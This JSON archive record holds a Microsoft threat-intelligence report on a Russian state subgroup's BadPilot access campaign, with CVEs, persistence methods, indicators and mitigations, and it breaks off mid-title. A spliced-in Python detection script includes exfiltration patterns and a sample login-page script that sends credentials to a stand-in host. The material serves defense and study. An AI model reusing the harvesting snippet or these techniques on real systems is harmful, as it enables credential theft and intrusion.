{
	"id": "7f6f8740-f68e-4cc7-9b5f-592c7e153b36",
	"created_at": "2026-04-06T00:18:36.333519Z",
	"updated_at": "2026-04-10T13:13:05.297847Z",
	"deleted_at": null,
	"sha1_hash": "614ba46c4d82bf61c82ae27fc13348aa15b87319",
	"title": "The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1701414,
	"plain_text": "The BadPilot campaign: Seashell Blizzard subgroup conducts\r\nmultiyear global access operation | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2025-02-12 · Archived: 2026-04-05 18:18:09 UTC\r\nMicrosoft is publishing for the first time our research into a subgroup within the Russian state actor Seashell\r\nBlizzard and its multiyear initial access operation, tracked by Microsoft Threat Intelligence as the “BadPilot\r\ncampaign”. This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable\r\nSeashell Blizzard to persist on high-value targets and support tailored network operations. This blog details this\r\nsubgroup’s recently observed tactics, techniques, and procedures (TTPs), and describes three of its distinct\r\nexploitation patterns. The geographical targeting to a near-global scale of this campaign expands Seashell\r\nBlizzard’s scope of operations beyond Eastern Europe. Additionally, the opportunistic access methods outlined in\r\nthis campaign will continue to offer Russia opportunities for niche operations and activities.\r\nActive since at least 2021, this subgroup within Seashell Blizzard has leveraged opportunistic access techniques\r\nand stealthy forms of persistence to collect credentials, achieve command execution, and support lateral\r\nmovement that has at times led to substantial regional network compromises. Observed operations following\r\ninitial access indicate that this campaign enabled Seashell Blizzard to obtain access to global targets across\r\nsensitive sectors including energy, oil and gas, telecommunications, shipping, arms manufacturing, in addition to\r\ninternational governments. We assess that this subgroup has been enabled by a horizontally scalable capability\r\nbolstered by published exploits that allowed Seashell Blizzard to discover and compromise numerous Internet-facing systems across a wide range of geographical regions and sectors. 
Since early 2024, the subgroup has\r\nexpanded its range of access to include targets in the United States and United Kingdom by exploiting\r\nvulnerabilities primarily in ConnectWise ScreenConnect (CVE-2024-1709) IT remote management and\r\nmonitoring software and Fortinet FortiClient EMS security software (CVE-2023-48788). These new access\r\noperations built upon previous efforts between 2021 and 2023 which predominantly affected Ukraine, Europe, and\r\nspecific verticals in Central and South Asia, and the Middle East.\r\nMicrosoft Threat Intelligence assesses that while some of the subgroup’s targeting is opportunistic, its\r\ncompromises cumulatively offer Seashell Blizzard options when responding to Russia’s evolving strategic\r\nobjectives. Since April 2022, Russia-aligned threat actors have increasingly targeted international organizations\r\nthat are either geopolitically significant or provide military and/or political support to Ukraine. In addition to\r\nestablishing access to these targets outside Ukraine, we assess that the subgroup has likely enabled at least three\r\ndestructive cyberattacks in Ukraine since 2023 (see below discussion of Seashell Blizzard for more information\r\nabout their activities against Ukraine).  \r\nSeashell Blizzard’s far-reaching access operations pose a significant risk to organizations within the group’s\r\nstrategic purview. Despite the commodity nature of this subgroup’s exploitation patterns, notable shifts within the\r\nactor’s post-compromise tradecraft are reflected within the subgroup’s activities, which may carry over to other\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 1 of 19\n\naspects of Seashell Blizzard’s more traditional operations and carry more significant implications for auditing\r\nduring incident response. 
\r\nMicrosoft Threat Intelligence tracks campaigns launched by Seashell Blizzard as well as this subgroup, and when\r\nable, directly notifies customers who have been targeted or compromised, providing them with the necessary\r\ninformation to help secure their environments. As part of our continuous monitoring, analysis, and reporting on\r\nthe threat landscape, we are sharing our research on this campaign’s activity to raise awareness of the observed\r\nTTPs and to educate organizations on how to harden their attack surfaces against this and similar activity. \r\nWho is Seashell Blizzard?\r\nSeashell Blizzard is a high-impact threat actor linked to the Russian Federation that conducts global activities on\r\nbehalf of Russian Military Intelligence Unit 74455 (GRU). Seashell Blizzard’s specialized operations have ranged\r\nfrom espionage to information operations and cyber-enabled disruptions, usually in the form of destructive attacks\r\nand manipulation of industrial control systems (ICS). Active since at least 2013, this threat actor’s prolific\r\noperations include destructive attacks such as KillDisk (2015) and FoxBlade (2022), supply-chain attacks\r\n(MeDoc, 2017), and pseudo-ransomware attacks such as NotPetya (2017) and Prestige (2022), in addition to\r\nnumerous other specialized disruptive capabilities. Seashell Blizzard is assessed to be highly skilled at enabling\r\nbroad and persistent access against priority computer networks, which sometimes gives the group significant\r\ntenure for future potential follow-on activity.\r\nDue to their specialization in computer network exploitation (CNE) and expertise targeting critical infrastructure\r\nsuch as ICS and supervisory control and data acquisition systems (SCADA), Seashell Blizzard’s operations have\r\nfrequently been leveraged during military conflicts and as an adaptable element during contentious geopolitical\r\nevents. 
Historically, some of Seashell Blizzard’s operations may be considered part of a spectrum of retaliatory\r\nactions sometimes used by the Russian Federation. Since Russia’s invasion of Ukraine in 2022, Seashell Blizzard\r\nhas conducted a steady stream of operations complementing Russian military objectives. The threat actor’s\r\nlongstanding strategic targets in the region have included critical infrastructure such as energy and water,\r\ngovernment, military, transportation and logistics, manufacturing, telecommunications, and other supportive\r\ncivilian infrastructure.\r\nSince at least April 2023, Seashell Blizzard has increased targeting of military communities in the region, likely\r\nfor tactical intelligence gain. Their persistent targeting of Ukraine suggests Seashell Blizzard is tasked to obtain\r\nand retain access to high-priority targets to provide the Russian military and Russian government a range of\r\noptions for future actions.\r\nSeashell Blizzard’s network intrusions leverage diverse tradecraft and typically employ a range of common\r\npublicly available tools, including Cobalt Strike and DarkCrystalRAT. 
Network intrusions linked to the threat\r\nactor have affected multiple tiers of infrastructure, showcasing Seashell Blizzard’s abilities to target end users,\r\nnetwork perimeters, and vertical-specific systems leveraging both publicly available and custom exploits and\r\nmethods.\r\nSince February 2022, Seashell Blizzard has generally taken three approaches to their network intrusions:\r\nTargeted: Seashell Blizzard has frequently used tailored mechanisms to access targets, including scanning\r\nand exploitation of specific victim infrastructure, phishing, and modifying legitimate functionality of\r\nexisting systems to either expand network access or obtain confidential information.\r\nOpportunistic: Seashell Blizzard has increasingly used broad exploitation of Internet-facing infrastructure\r\nand distribution of malware implants spread through trojanized software to achieve scalable but\r\nindiscriminate access. In cases where a resulting victim is identified as strategically valuable, Microsoft\r\nThreat Intelligence has observed the threat actor conducting significant post-compromise activities.\r\nHybrid: Seashell Blizzard has very likely gained access to target organizations using a limited supply-chain\r\nattack narrowly focused within Ukraine, an operation that was recently mitigated by the Computer\r\nEmergency Response Team of Ukraine (CERT-UA). 
Other hybrid methods have included compromise of\r\nregional managed IT service providers, which often afforded regional or vertical-specific access to diverse\r\ntargets.\r\nSeashell Blizzard overlaps with activity tracked by other security vendors as BE2, UAC-0133, Blue Echidna,\r\nSandworm, PHANTOM, BlackEnergy Lite, and APT44.\r\nAttribution assessment\r\nMicrosoft Threat Intelligence assesses that the initial access subgroup is linked to Seashell Blizzard. Despite the\r\nsubgroup’s opportunistic tactics, we are able to distinguish this subgroup due to its consistent use of distinct\r\nexploits, tooling, infrastructure, and late-stage methods used to establish persistence. Moreover, our longstanding\r\nforensic investigation uncovered distinct post-compromise activities, a part of which incorporated specific\r\noperational capabilities and resources chiefly utilized by Seashell Blizzard. We have also observed the initial\r\naccess subgroup to pursue access to an organization prior to a Seashell Blizzard-linked destructive attack.\r\nScope of operations and targeting trends\r\nMicrosoft Threat Intelligence assesses that Seashell Blizzard uses this initial access subgroup to horizontally scale\r\ntheir operations as new exploits are acquired and to sustain persistent access to current and future sectors of\r\ninterest to Russia. This subgroup conducts broad operations against a variety of sectors and geographical areas. In\r\n2022, its primary focus was Ukraine, specifically targeting the energy, retail, education, consulting, and\r\nagriculture sectors. In 2023, it globalized the scope of its compromises, leading to persistent access within\r\nnumerous sectors in the United States, Europe, Central Asia, and the Middle East. It frequently prioritized sectors\r\nthat either provided material support to the war in Ukraine or were geopolitically significant. 
In 2024, while the\r\nexposure of multiple vulnerabilities likely offered the subgroup more access than ever, it appeared to have honed\r\nits focus to the United States, Canada, Australia, and the United Kingdom.\r\nThis subgroup’s historical pattern of exploitation has also led to the compromise of globally diverse organizations\r\nthat appear to have limited or no utility to Russia’s strategic interests. This pattern suggests the subgroup likely\r\nuses an opportunistic “spray and pray” approach to achieving compromises at scale to increase the likelihood of\r\nacquiring access at targets of interest with limited tailored effort. In cases where a strategically significant target is\r\ncompromised, we have observed significant later post-compromise activity. The geographic focus of the subgroup\r\nfrequently transitions between broad campaigns against multiple geographic targets and a narrow focus on specific\r\nregions or countries, demonstrating the subgroup’s flexibility to pursue unique regional objectives.\r\nFigure 1. The geographical spread of the initial access subgroup’s targets\r\nInitial access subgroup opportunistically compromises perimeter infrastructure\r\nusing published CVEs\r\nSince late 2021, Seashell Blizzard has used this initial access subgroup to conduct targeted operations by\r\nexploiting vulnerable Internet-facing infrastructure following discovery through direct scanning and, more\r\nuniquely, use of third-party internet scanning services and knowledge repositories. These exploitation efforts are\r\nfollowed by an operational lifecycle using a consistent set of TTPs to support persistence and lateral movement,\r\nwhich have incrementally evolved to become more evasive over time. 
Microsoft Threat Intelligence has identified\r\nat least three distinct exploitation patterns and operational behaviors linked to this subgroup, which are described\r\nin more detail below:\r\nFigure 2. Seashell Blizzard initial access subgroup operational lifecycle\r\nTo date, at least eight vulnerabilities common within specific categories of server infrastructure typically found on\r\nnetwork perimeters of small office/home office (SOHO) and enterprise networks have been exploited by this\r\nsubgroup:\r\nMicrosoft Exchange (CVE-2021-34473)\r\nZimbra Collaboration (CVE-2022-41352)\r\nOpenFire (CVE-2023-32315)\r\nJetBrains TeamCity (CVE-2023-42793)\r\nMicrosoft Outlook (CVE-2023-23397)\r\nConnectWise ScreenConnect (CVE-2024-1709)\r\nFortinet FortiClient EMS (CVE-2023-48788)\r\nJBoss (exact CVE is unknown)\r\nIn nearly all cases of successful exploitation, Seashell Blizzard carried out measures to establish long-term\r\npersistence on affected systems. 
This persistent access is noted in at least three cases to have preceded select\r\ndestructive attacks attributed to Seashell Blizzard, highlighting that the subgroup may periodically enable\r\ndestructive or disruptive attacks.\r\nExploitation patterns\r\nWe have observed the initial access subgroup using three specific exploit patterns:\r\nDeployment of remote management and monitoring (RMM) suites for persistence and command\r\nand control (February 24, 2024 – present)\r\nIn early 2024, the initial access subgroup began using RMM suites, which was a novel technique used by Seashell\r\nBlizzard to achieve persistence and command and control (C2). This was first observed when the subgroup\r\nexploited vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). The subgroup then deployed RMM software such as Atera Agent and Splashtop Remote Services.\r\nThe use of RMM software allowed the threat actor to retain critical C2 functions while masquerading as a\r\nlegitimate utility, which made it less likely to be detected than a remote access trojan (RAT). While these TTPs\r\nhave been used by other nation-state threat actors since at least 2022, including by Iranian state actor Mango\r\nSandstorm, the Seashell Blizzard initial access subgroup’s specific techniques are considered distinct.\r\nFigure 3. Use of ScreenConnect to install Atera Agent\r\nDuring the first weeks of this exploitation pattern, the initial access subgroup primarily targeted organizations in\r\nUkraine, the United States, Canada, the United Kingdom, and Australia. It is highly likely that Seashell Blizzard\r\nconducted post-compromise activity at only a limited number of organizations that were part of this initial victim\r\npool. 
For these organizations, Seashell Blizzard conducted preliminary credential access through multiple means\r\nand deployed at least one custom utility to facilitate remote access and tunneling (see the section on ShadowLink\r\nbelow for more information).\r\nBoth CVE-2024-1709 and CVE-2023-48788 provided the ability to launch arbitrary commands on a vulnerable\r\nserver. Following exploitation, the subgroup used two methods of payload retrieval to install RMM agents on\r\naffected servers:\r\nRetrieval of Atera Agent installers from legitimate agent endpoints – Commonly observed on exploited\r\nScreenConnect servers, Seashell Blizzard used resulting command execution to retrieve Atera installers via\r\nBitsadmin and curl from legitimate installation URLs hosted by Atera.\r\nRetrieval of Atera Agent from actor-controlled infrastructure – During exploitation of CVE-2023-48788\r\nbetween April 9 and April 10, 2024, Seashell Blizzard retrieved remote agent installers from actor-controlled virtual private server (VPS) infrastructure.\r\nFollowing installation of RMM software, Seashell Blizzard uses the native functionality of the agents to deploy\r\nsecondary tools to support credential acquisition, data exfiltration, and upload of custom utilities to facilitate more\r\nrobust access to compromised systems.\r\nSeashell Blizzard likely uses three primary methods of credential access:\r\nRegistry-based credential access via reg.exe:\r\nCredential access via renamed procdump:\r\nSince RMM agents typically afford an interactive graphical interface, native credential access mechanisms\r\nsuch as dumping the LSASS process from the Task Manager UI were likely also carried out.\r\nDuring Seashell Blizzard intrusions, we observed rclone.exe deployed to affected servers and subsequently used to\r\ncarry out data exfiltration using an actor-supplied configuration file.\r\nAmong a subgroup of victims, Seashell Blizzard carried out unique post-compromise activity, indicating that the\r\nthreat actor sought more durable persistence and direct access. In these cases, Seashell Blizzard deployed\r\nOpenSSH with a unique public key, allowing them to access compromised systems using an actor-controlled\r\naccount and credential, in addition to a unique persistence and assured C2 method known to Microsoft Threat\r\nIntelligence as ShadowLink.\r\nFigure 4. How ShadowLink avoids discovery\r\nShadowLink facilitates persistent remote access by configuring a compromised system to be registered as a Tor\r\nhidden service. This is achieved using a combination of Tor service binaries and a unique actor-defined Tor\r\nconfiguration file (referred to as the ‘torrc’) configuring the system for remote access. Systems compromised with\r\nShadowLink receive a unique .onion address, making them remotely accessible via the Tor network. This\r\ncapability allows Seashell Blizzard to bypass the common pattern of deploying a RAT, which typically\r\nrelies on some form of C2 to actor-controlled infrastructure that is often easily audited and identified by\r\nnetwork administrators. 
Instead, by relying on Tor hidden services, the compromised system creates a persistent\r\ncircuit to the Tor network, acting as a covert tunnel, effectively cloaking all inbound connections to the affected\r\nasset and limiting exposures from both the actor and victim environment.\r\nShadowLink contains two primary components: a legitimate Tor service binary and a torrc which contains\r\nrequisite configurations for the Tor hidden services address—specifically, port-forwarding for common services\r\nsuch as Remote Desktop Protocol (RDP) and Secure Shell (SSH). Commonly, Seashell Blizzard has\r\nutilized ShadowLink to redirect inbound connections to the Tor hidden service address to the RDP port (3389).\r\nShadowLink persisted via a system service:\r\nMicrosoft Threat Intelligence has also observed Forest Blizzard, a separate GRU actor, leveraging similar Tor-based capabilities in their operations.\r\nWeb shell deployment for persistence and C2 (late 2021 – present)\r\nSince late 2021, the Seashell Blizzard initial access subgroup has primarily deployed web shells following\r\nsuccessful exploitation to maintain footholds and achieve the ability to execute commands necessary to deploy\r\nsecondary tooling to assist lateral movement. To date, this exploit pattern remains its predominant persistence\r\nmethod. Beginning in mid-2022, this pattern of exploitation enabled unique post-compromise activities against\r\norganizations in Central Asia and Europe, which were likely intended to further Russia’s geopolitical objectives\r\nand preposition against select strategic targets.\r\nFigure 5. 
Seashell Blizzard exploitation of CVE-2021-34473 and CVE-2022-41352\r\nExploitation of Microsoft Exchange and Zimbra vulnerabilities\r\nMicrosoft Threat Intelligence has identified at least two web shells consistently deployed by this initial access\r\nsubgroup. While web shells can be deployed using a variety of methods, they are most often deployed following\r\nthe exploitation of vulnerabilities allowing remote code execution (RCE) or achieving some level of arbitrary file\r\nupload. In the case of the initial access subgroup, we have observed web shells deployed following exploitation of\r\nvulnerabilities in Microsoft Exchange (CVE-2021-34473) and Zimbra (CVE-2022-41352). In cases where RCE is\r\navailable, the initial access subgroup routinely retrieves web shells from actor-controlled infrastructure. This\r\ninfrastructure can be either legitimate but compromised websites or dedicated actor infrastructure.\r\nWe observed the following web shell retrieval commands being used:\r\nMicrosoft Threat Intelligence has identified a web shell that we assess as exclusive to the initial access subgroup\r\nand is associated with the previously mentioned web shell retrieval patterns. Detected as LocalOlive, this web\r\nshell is identified on compromised perimeter infrastructure and serves as the subgroup’s primary means of\r\nachieving C2 and deploying additional utilities to compromised infrastructure. Written in ASPX with C#,\r\nthe web shell carries sufficient yet rudimentary functionality to support the following secondary activities:\r\nUpload and download files\r\nRun shell commands\r\nOpen a port (default port is set to TCP 250)\r\nFigure 6. LocalOlive web shell def.aspx\r\nOn October 24, 2022, the initial access subgroup successfully exploited CVE-2022-41352. 
This Zimbra\r\nCollaboration vulnerability allows a threat actor to deploy web shells and other arbitrary files by sending an email\r\nwith a specially crafted attachment, effectively exploiting an arbitrary file-write vulnerability. The initial access\r\nsubgroup leveraged this vulnerability to deliver a primitive web shell to affected servers, allowing for execution of\r\narbitrary commands.\r\nEmails were sent from the following actor-controlled addresses:\r\nakfcjweiopgjebvh@proton.me\r\nohipfdpoih@proton.me\r\nmiccraftsor@outlook.com\r\namymackenzie147@protonmail.ch\r\nehklsjkhvhbjl@proton.me\r\nMirrowSimps@outlook.com\r\nFigure 7. Web shell used during Zimbra exploitation\r\nReconnaissance and fingerprinting\r\nAfter deploying web shells, the initial access subgroup executes a specific sequence of commands, likely\r\nused to fingerprint and attribute victim networks; this pattern may indicate either that operators are\r\nquick to capitalize on compromises or that automation follows successful exploitation.\r\nTunneling utilities deployment\r\nWhen Seashell Blizzard identifies targets of likely strategic value, it often furthers its network compromise by\r\ndeploying tunneling utilities such as Chisel, plink, and rsockstun to establish dedicated conduits into affected\r\nnetwork segments.\r\nWhen Chisel is deployed, it has often been given one of several file names, including:\r\nMsChSoft.exe\r\nMsNan.exe\r\nMsoft.exe\r\nChisel.exe\r\nWin.exe\r\nMsChs.exe\r\nMicrosoftExchange32.exe\r\nDesk.exe\r\nSys.exe\r\nFor example, the initial access subgroup has used the following tunneling 
commands:\r\nWhen rsockstun is deployed, it has been given file names such as Sc.exe.\r\nTunneling launch\r\nWhen establishing tunnels, the initial access subgroup has routinely established reverse tunnels to exclusive VPS\r\nactor-owned infrastructure, including:\r\nTunneling IP         First observed    Last observed\r\n103.201.129[.]130    May 2022          July 2022\r\n104.160.6[.]2        September 2022    December 2022\r\n195.26.87[.]209      September 2023    April 2024\r\nNote that these IP addresses are relevant within or around the timeframes enumerated in the table above. Some IP\r\naddresses may no longer be used by Seashell Blizzard at the time of this writing but are provided for historical and\r\nforensic understanding.\r\nModification of infrastructure to expand network influence through credential collection (late\r\n2021 – 2024)\r\nIn targeted operations where the initial access subgroup is likely seeking network access, Microsoft Threat\r\nIntelligence has observed subsequent malicious modifications to network resources including Outlook Web\r\nAccess (OWA) sign-in pages and DNS configurations.\r\nFigure 8. Simple attack chain for Seashell Blizzard exploitation of OWA\r\nModifying network resources allows Seashell Blizzard to passively gather relevant network credentials, which\r\nmay be used to expand the actor’s access to sensitive information and widen its access to target networks in\r\ngeneral. 
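One way to check whether a served OWA sign-in page has been tampered with in this way is to fetch the page as a client would and audit every script it loads or embeds against the organization's own hosts. The following is an added example written for this page, not code from the Microsoft post. The page it inspects and the collection host in it are constructed, and the inline-script heuristic (reads the username or password field and sends to a host that is not on the allow-list) is an assumption about what such an injection looks like rather than the actor's actual code.

```python
"""Audit an OWA logon page for injected credential-harvesting JavaScript.

Added example (not code from the Microsoft post). It walks the HTML a client
received, records every external script source and every inline script, and
reports scripts that load from, or send credentials to, hosts outside the
organization's allow-list. The sample page and the collector host in it are
constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Signs that inline script reads what the user types and ships it off-host.
READS_CREDS = re.compile(r"(password|passwd|pwd|username)\b", re.I)
SENDS_OUT = re.compile(r"(XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|new\s+Image\b|\.src\s*=)", re.I)
URLS = re.compile(r"https?://[^\s'\"()]+", re.I)


class ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data          # script text may arrive in chunks


def _host(url, page_host):
    """Host of a script URL; a relative src stays on the page's own host."""
    return (urlparse(url).hostname or page_host).lower()


def audit_logon_page(html, page_host, allowed_hosts):
    """Return [(kind, host)] findings: off-list external scripts, and inline
    scripts that read credentials and post them to an off-list host."""
    allowed = {h.lower() for h in allowed_hosts} | {page_host.lower()}
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = _host(src, page_host)
        if host not in allowed:
            findings.append(("external_script", host))
    for body in parser.inline:
        if not (READS_CREDS.search(body) and SENDS_OUT.search(body)):
            continue
        targets = {_host(u, page_host) for u in URLS.findall(body)} - allowed
        if targets:
            findings.append(("inline_harvester", ",".join(sorted(targets))))
    return findings


# Constructed page: a stock-looking OWA form with one injected snippet appended.
SAMPLE_PAGE = """<html><head>
<script src="/owa/auth/15.2.1118/scripts/premium/flogon.js"></script>
<script src="https://owa.example.test/owa/auth/logon.js"></script>
</head><body>
<form name="logonForm" action="/owa/auth.owa" method="POST">
<input id="username" name="username"><input id="password" name="password" type="password">
<input type="submit"></form>
<script>
document.forms.logonForm.addEventListener("submit", function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  new Image().src = "https://collector.example.org/s.gif?u=" + encodeURIComponent(u) + "&p=" + encodeURIComponent(p);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_logon_page(SAMPLE_PAGE, "owa.example.test", ["owa.example.test"]):
        print(kind, detail)
```

The page-side check looks at what the user's browser receives, which is where the harvesting runs; pair it with integrity monitoring of the OWA logon page files on the Exchange server itself, because the modification described here is made server-side and a changed file hash is the stronger signal. An inline script that stages credentials without an off-host URL in its body (for example by writing them into a cookie that another request carries out) passes this heuristic, so any unexpected inline block on a sign-in page still deserves a manual read.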
Notably, the infrastructure associated with this unique technique is sometimes also used in the two prior\r\nexploitation patterns, highlighting the versatility of late-stage infrastructure which may not always be limited to\r\ndistinct patterns of exploitation.\r\nModification of web access sign-in portals\r\nThe initial access subgroup uses rogue JavaScript inserted into otherwise legitimate sign-in portals. This malicious\r\nJavaScript collects and sends clear text usernames and passwords to actor-controlled infrastructure as they are\r\nsubmitted in real time by users of the affected organization. We assess that this method has likely afforded the\r\nsubgroup credentials to support lateral movement within several organizations.\r\nMicrosoft Threat Intelligence has tracked the following actor-controlled infrastructure linked to this unique\r\ncredential collection method when modifying legitimate OWA sign-in pages:\r\nhwupdates[.]com\r\ncloud-sync[.]org\r\n103.201.129[.]130\r\nFigure 9. Seashell Blizzard credential collection from OWA\r\nModification of DNS configurations\r\nMicrosoft Threat Intelligence assesses with moderate confidence that the initial access subgroup has modified\r\nDNS A record configurations for select targets. 
While the purpose of these modifications is unclear, given the\r\nnature of the affected systems it is possible that they were intended to intercept credentials from critical\r\nauthentication services.\r\nConclusion\r\nGiven that Seashell Blizzard is Russia’s cyber tip of the spear in Ukraine, Microsoft Threat Intelligence assesses\r\nthat this access subgroup will continue to innovate new horizontally scalable techniques to compromise networks\r\nboth in Ukraine and globally in support of Russia’s war objectives and evolving national priorities. This subgroup,\r\nwhich is characterized within the broader Seashell Blizzard organization by its near-global reach, represents an\r\nexpansion in both the geographical targeting conducted by Seashell Blizzard and the scope of its operations. At the\r\nsame time, Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive\r\nopportunities for niche operations and activities that will continue to be valuable over the medium term.\r\nMitigation and protection guidance\r\nTo harden networks against the Seashell Blizzard activity listed above, defenders can implement the following:\r\nStrengthen operating environment configuration\r\nUtilize a vulnerability management system, such as Microsoft Defender Vulnerability Management, to\r\nmanage vulnerabilities, weaknesses, and remediation efforts across your environment’s operating systems,\r\nsoftware inventories, and network devices.\r\nRequire multifactor authentication (MFA). 
While certain attacks such as AiTM phishing attempt to\r\ncircumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly\r\neffective at stopping a variety of threats.\r\nLeverage phishing-resistant authentication methods such as FIDO tokens or Microsoft\r\nAuthenticator with passkey. Avoid telephony-based MFA methods to reduce the risk of\r\nSIM-jacking.\r\nImplement Entra ID Conditional Access authentication strength to require phishing-resistant authentication\r\nfor employees and external users for critical apps.\r\nEncourage users to use Microsoft Edge and other web browsers that support Microsoft Defender\r\nSmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites\r\nthat host malware.\r\nOrganizations can also use Microsoft Defender External Attack Surface Management (EASM), a tool that\r\ncontinuously discovers and maps your digital attack surface to provide an external view of your online\r\ninfrastructure. EASM leverages vulnerability and infrastructure data to generate Attack Surface Insights,\r\nreporting that highlights key risks to a given organization.\r\nEnable Network Level Authentication for Remote Desktop Service connections.\r\nEnable AppLocker to restrict specific software tools prohibited within the organization, such as\r\nreconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.\r\nStrengthen Microsoft Defender for Endpoint configuration\r\nEnsure that tamper protection is enabled in Microsoft Defender for Endpoint.\r\nEnable network protection in Microsoft Defender for Endpoint. 
\r\nTurn on web protection.\r\nRun endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can\r\nblock malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when\r\nMicrosoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to\r\nremediate malicious artifacts that are detected post-breach.\r\nConfigure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint\r\ntake immediate action on alerts to resolve breaches, significantly reducing alert volume.\r\nMicrosoft Defender XDR customers can turn on the following attack surface reduction rules to prevent\r\ncommon attack techniques used by threat actors.\r\nBlock executable content from email client and webmail\r\nBlock executable files from running unless they meet a prevalence, age, or trusted list criterion\r\nBlock execution of potentially obfuscated scripts\r\nBlock JavaScript or VBScript from launching downloaded executable content\r\nBlock process creations originating from PSExec and WMI commands\r\nStrengthen Microsoft Defender Antivirus configuration\r\nTurn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus\r\nproduct, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections\r\nblock a majority of new and unknown variants. 
\r\nEnable Microsoft Defender Antivirus scanning of downloaded files and attachments.\r\nEnable Microsoft Defender Antivirus real-time protection.\r\nTurn on PUA protection in block mode in Microsoft Defender Antivirus.\r\nStrengthen Microsoft Defender for Office 365 configuration\r\nTurn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.\r\nEnable Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365 to quarantine sent mail in\r\nresponse to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or\r\nmalware messages that have already been delivered to mailboxes.\r\nInvest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft\r\nDefender for Office 365 merges incident and alert management across email, devices, and identities,\r\ncentralizing investigations for email-based threats.\r\nConfigure Microsoft Defender for Office 365 to recheck links on click.\r\nUse the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing\r\nand password attack campaigns.
Run spear-phishing (credential harvest) simulations to train end-users\r\nagainst clicking URLs in unsolicited messages and disclosing credentials.\r\nStrengthen Microsoft Defender for Identity configuration\r\nPrevent clear text credential exposure.\r\nReduce lateral movement paths that may be used by attackers.\r\nIdentify legacy components that may introduce security vulnerabilities.\r\nMicrosoft Defender XDR detections\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus detects this threat as the following malware:\r\nHackTool:Win64/ShadowLink.A!dha\r\nHackTool:Win64/ShadowLink.B!dha\r\nExploit:Python/CVE-2024-1709\r\nRansom:Win32/Inc.MA\r\nBackDoor:PHP/Remoteshell.V\r\nTrojan:Win32/LocalOlive.A!dha\r\nTrojan:Win32/LocalOlive.B!dha\r\nTrojan:Win32/LocalOlive.C!dha\r\nMicrosoft Defender for Endpoint\r\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\r\nSeashell Blizzard activity group\r\nThe following alerts might also indicate threat activity related to this threat.
Note, however, that these alerts can also\r\nbe triggered by unrelated threat activity.\r\nPossible Seashell Blizzard activity\r\nSuspicious Atera installation via ScreenConnect\r\nSuspicious command execution via ScreenConnect\r\nSuspicious sequence of exploration activities\r\nCredentialDumpingViaEsentutlDetector\r\nSuspicious behavior by cmd.exe was observed\r\nSQL Server login using xp_cmdshell\r\nSuspicious port scan activity within an RDP session\r\nSuspicious connection to remote service\r\nSuspicious usage of remote management software\r\nNew local admin added using Net commands\r\nSensitive data was extracted from registry\r\nSuspicious Scheduled Task Process Launched\r\nPotential human-operated malicious activity\r\nCompromised account conducting hands-on-keyboard attack\r\nSensitive file access for possible data exfiltration or encryption\r\nPossible Fortinet FortiClientEMS vulnerability exploitation\r\nPossible target of NTLM credential theft\r\nPossible exploitation of ProxyShell vulnerabilities\r\nPossibly malicious use of proxy or tunneling tool\r\nHidden dual-use tool launch attempt\r\nMicrosoft Defender for Cloud\r\nThe following alerts might also indicate threat activity associated with this threat.
These alerts, however, can be\r\ntriggered by unrelated threat activity and are not monitored in the status cards provided with this report.\r\nCommunication with suspicious domain identified by threat intelligence\r\nSuspicious PowerShell Activity Detected\r\nDetected suspicious combination of HTA and PowerShell\r\nDetected encoded executable in command line data\r\nDetected obfuscated command line\r\nThreat intelligence reports\r\nMicrosoft customers can use the following reports in Microsoft products to get the most up-to-date information\r\nabout the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the\r\nintelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated\r\nthreats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security\r\nCopilot integration in Microsoft Defender Threat Intelligence to get more information about this threat actor.\r\nMicrosoft Defender Threat Intelligence\r\nSeashell Blizzard\r\nSeashell Blizzard uses new ShadowLink variant\r\nSeashell Blizzard exploiting vulnerabilities to install Atera Agent for post-compromise activities\r\nSeashell Blizzard launches destructive attack against local Ukrainian government, Storm-1512 takes credit\r\nCredential Theft via Modification of Outlook Web Access (OWA) Login Pages\r\nSeashell Blizzard Targeting Zimbra Servers Using Malicious Email Attachment\r\nSeashell Blizzard Uses TOR Hidden Services on Targets for Persistence and 